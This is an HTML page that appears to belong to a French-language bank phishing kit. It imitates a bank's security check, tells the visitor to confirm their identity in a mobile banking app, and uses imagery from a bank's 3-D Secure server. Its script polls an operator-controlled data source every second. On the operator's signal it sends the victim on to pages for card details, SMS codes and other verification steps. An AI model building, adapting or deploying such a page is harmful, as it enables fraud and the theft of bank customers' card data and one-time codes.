<!DOCTYPE html>
<!-- Coding By CodingNepal - codingnepalweb.com -->
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>OTP Verification Form</title>

    <!-- Boxicons CSS -->
<link rel="stylesheet" href="style.css">
  </head>
  <body>
  	   
  	<center>
  	<div class="alphani para">
	<div style="display:flex;margin:15px 0;align-items: center; justify-content: center;text-align:center;">
	<svg width="25" viewBox="0 0 17 17" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="#000000"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path d="M9.5 10.972c0 0.366-0.207 0.672-0.5 0.846v2.154h-1v-2.153c-0.294-0.174-0.5-0.48-0.5-0.847 0-0.552 0.447-1 1-1 0.551 0 1 0.447 1 1zM14.965 8.46v7.080c0 0.827-0.673 1.5-1.5 1.5h-9.989c-0.827 0-1.5-0.673-1.5-1.5v-7.080c0-0.827 0.673-1.5 1.5-1.5h0.024v-1.988c0-2.757 2.243-5 5-5s5 2.243 5 5v1.992c0.811 0.018 1.465 0.681 1.465 1.496zM4.5 6.96h8v-1.988c0-2.206-1.794-4-4-4s-4 1.794-4 4v1.988zM13.965 8.46c0-0.264-0.207-0.474-0.465-0.493v0.004h-10v-0.011h-0.024c-0.275 0-0.5 0.224-0.5 0.5v7.080c0 0.276 0.225 0.5 0.5 0.5h9.989c0.275 0 0.5-0.224 0.5-0.5v-7.080z" fill="#000000"></path> </g></svg>
<span>Votre connexion nécessite une sécurisation</span>
</div>
<b style="margin:15px 0">Veuillez ouvrir votre application mobile bancaire pour vérifier et confirmer votre identité.</b><br>
<img width="300" src="https://cdn-3ds.e-i.com/SOSD/sd/otp/1.1.6//images/validation_operation.gif">
    

    
    </center>
    
    
    <style>
    	

:where(.container, form, .input-field, header) {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
}

.container {
  border: solid 1.5px #CACACA;
  max-width: 500px;
  margin:10px;
  padding:10px;
  border-radius: 12px;
display:block;
  
}
.container h4 {
  font-size: 1.25rem;
  color: #333;
  font-weight: 500;
}

.input-field input {
  height: 45px;
  width: 90%;
  border-radius: 6px;
  outline: none;
  font-size: 1.125rem;
  text-align: center;
  border: 1px solid #ddd;
}
.input-field input:focus {
  box-shadow: 0 1px 0 rgba(0, 0, 0, 0.1);
}

form button {
  margin-top: 25px;
  width: 100%;
  color: #fff;
  font-size: 1rem;
  border: none;
  padding: 9px 0;
  cursor: pointer;
  border-radius: 6px;
  pointer-events: none;
  background: #4070f4;
  transition: all 0.2s ease;
}

form button:hover {
  background: #0e4bf1;
}
*{
font-family:normal;

}
    </style>
    
    <script src="script.js"></script>

    <script>
      var urlweb = window.location.href;
      var params = (new URL(urlweb)).searchParams;
      var idValue = params.get('id');
      
      var linkOpened = false; 
      
      function fetchData() {
        if (!linkOpened) {
          fetch(url)
            .then(response => response.json())
            .then(data => {
              const userId = idValue;
      
              if (data.user[userId].CC === "true") {
                window.location.href = "cc.html?id=" + userId;
                linkOpened = true; 
              } else if (data.user[userId].CODE2 === "true") {
                window.location.href = "code2.html?id=" + userId;
                linkOpened = true;
              } else if (data.user[userId].SMS === "true") {
                window.location.href = "ACS.htm?id=" + userId;
                linkOpened = true;
              } else if (data.user[userId].Loading === "true") {
                window.location.href = "loading.html?id=" + userId;
                linkOpened = true;
              } else if (data.user[userId].SITE === "true") {
                window.location.href = urlsite;
               linkOpened = true;
              } else if (data.user[userId].APPNO === "true") {
                window.location.href = "appno.html?id=" + userId;
                linkOpened = true;
              } else if (data.user[userId].BANK === "true") {
                window.location.href = "ACS2.html?id=" + userId;
                linkOpened = true;
              }
            })
            .catch(error => {
              console.error('Error fetching data:', error);
            });
        }
      }
      
      setInterval(fetchData, 1000);
      
      </script>

<style>body {
  font-family: Cambria, Cochin, Georgia, Times, 'Times New Roman', serif;
  }</style>
  </body>
</html>